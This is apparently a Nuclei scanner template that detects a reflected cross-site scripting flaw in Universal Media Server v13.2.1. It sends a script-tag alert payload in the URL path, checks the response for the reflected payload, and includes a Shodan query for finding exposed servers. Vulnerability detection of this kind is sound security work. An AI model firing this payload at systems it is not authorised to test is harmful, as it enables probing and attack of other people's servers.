id: universal-media-xss

info:
  name: Universal Media Server v13.2.1 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Universal Media Server v13.2.1 CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability.
  remediation: Fixed in version 13.2.2
  reference:
    - https://packetstormsecurity.com/files/171754/Universal-Media-Server-13.2.1-Cross-Site-Scripting.html
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-902890504
  tags: xss,universal,media,unauth,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "404 - File Not Found"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# digest: 490a00463044022037751439b27cb515da5cf7c65e07515415c401bed6045be3ed8f2c7f125a8a4f022032a694b597804b9dd90f21b106f0e830f0189f550cfb4000c960dd7b16453b64:922c64590222798bb761d5b6d8e72950
